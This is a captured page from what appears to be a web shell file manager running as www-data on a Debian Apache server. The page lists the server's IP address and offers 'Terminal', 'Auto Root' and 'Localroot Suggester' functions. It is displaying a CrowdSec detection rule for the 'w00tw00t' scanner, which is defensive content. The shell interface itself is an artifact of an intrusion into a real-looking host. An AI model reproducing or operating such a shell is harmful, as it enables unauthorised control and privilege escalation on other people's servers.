Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
crowdsec /
hub /
scenarios /
ltsich /
Delete
Unzip
Name
Size
Permission
Date
Action
http-w00tw00t.yaml
426
B
-rw-r--r--
2024-10-04 14:15
Save
Rename
#contributed by ltsich type: trigger name: ltsich/http-w00tw00t description: "detect w00tw00t" debug: false filter: "evt.Meta.log_type == 'http_access-log' && evt.Parsed.file_name contains 'w00tw00t.at.ISC.SANS.DFind'" groupby: evt.Meta.source_ip blackhole: 5m labels: service: http classification: - attack.T1595 spoofable: 0 confidence: 3 behavior: "http:scan" label: "w00t w00t Scanner" remediation: true